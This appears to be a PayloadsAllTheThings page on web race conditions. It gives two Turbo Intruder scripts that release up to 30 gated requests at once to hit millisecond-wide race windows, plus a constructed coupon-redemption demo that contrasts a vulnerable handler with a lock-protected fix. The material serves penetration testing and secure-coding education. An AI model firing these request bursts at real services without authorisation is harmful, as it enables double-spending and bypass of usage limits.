PayloadsAllTheThings/Race Condition
idealphase 9f9fbe4fe5
Updated Race Condition README.md
Added Turbo Intruder 2 Requests Examples, for use when the window may only be a few milliseconds.
2022-04-19 11:06:34 +07:00

Race Condition

Race conditions may occur when a process is critically or unexpectedly dependent on the sequence or timings of other events. In a web application environment, where multiple requests can be processed at a given time, developers may leave concurrency to be handled by the framework, server, or programming language.

Summary

Tools

Turbo Intruder Examples

  1. Send the request to Turbo Intruder
  2. Use this Python code as the Turbo Intruder payload script
    # RequestEngine and table are provided by Turbo Intruder's script environment
    def queueRequests(target, wordlists):
        engine = RequestEngine(endpoint=target.endpoint,
                               concurrentConnections=30,
                               requestsPerConnection=30,
                               pipeline=False
                               )

        for i in range(30):
            engine.queue(target.req, i)
            # gate='race1' withholds the final byte of each request until the gate is opened
            engine.queue(target.req, target.baseInput, gate='race1')

        engine.start(timeout=5)
        # release every request tagged 'race1' at the same time
        engine.openGate('race1')

        engine.complete(timeout=60)


    def handleResponse(req, interesting):
        table.add(req)

  3. Now set the external HTTP header x-request: %s - ⚠️ This is needed by the turbo intruder
  4. Click "Attack"

Turbo Intruder 2 Requests Examples

The following template can be used when you have to send request2 immediately after request1 and the race window may be only a few milliseconds.

def queueRequests(target, wordlists): 
    engine = RequestEngine(endpoint=target.endpoint, 
                           concurrentConnections=30, 
                           requestsPerConnection=100, 
                           pipeline=False 
                           ) 
    request1 = '''
POST /target-URI-1 HTTP/1.1
Host: <REDACTED>
Cookie: session=<REDACTED>

parameterName=parameterValue
    ''' 

    request2 = '''
GET /target-URI-2 HTTP/1.1
Host: <REDACTED>
Cookie: session=<REDACTED>
    '''

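    # request1 and all 30 copies of request2 wait behind the same gate
    engine.queue(request1, gate='race1')
    for i in range(30):
        engine.queue(request2, gate='race1')
    # opening the gate releases every queued 'race1' request together
    engine.openGate('race1')
    engine.complete(timeout=60)


def handleResponse(req, interesting):
    table.add(req)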
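
The server-side flaw that gated requests like these expose, next to its fix, as an added example that is not part of the original README. `CouponStore`, its methods and the 50 ms delay are constructed for illustration, and a `threading.Barrier` stands in for the gate.

```python
import threading
import time


class CouponStore:
    """Constructed single-use coupon handler (hypothetical, for illustration)."""

    def __init__(self):
        self.redeemed = False            # shared state read by every request
        self.applied = []                # one entry per time the discount was granted
        self._lock = threading.Lock()

    def redeem_vulnerable(self):
        if not self.redeemed:            # check
            time.sleep(0.05)             # stands in for DB/network latency: the race window
            self.applied.append(1)       # act
            self.redeemed = True

    def redeem_safe(self):
        with self._lock:                 # check and act happen as one atomic step
            if not self.redeemed:
                time.sleep(0.05)
                self.applied.append(1)
                self.redeemed = True


def run_concurrent(handler, workers=10):
    """Release `workers` calls at once, like requests held behind one gate."""
    barrier = threading.Barrier(workers)

    def worker():
        barrier.wait()                   # every thread blocks here until all are ready
        handler()

    threads = [threading.Thread(target=worker) for _ in range(workers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()


def demo():
    """Return (grants by the vulnerable handler, grants by the locked handler)."""
    weak, fixed = CouponStore(), CouponStore()
    run_concurrent(weak.redeem_vulnerable)
    run_concurrent(fixed.redeem_safe)
    return len(weak.applied), len(fixed.applied)


if __name__ == "__main__":
    print("vulnerable grants: %d, locked grants: %d" % demo())
```

An in-process lock only covers a single worker process. In a deployed application the same guarantee has to come from the data store, for example a conditional update whose affected-row count is checked, or a row lock inside a transaction.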
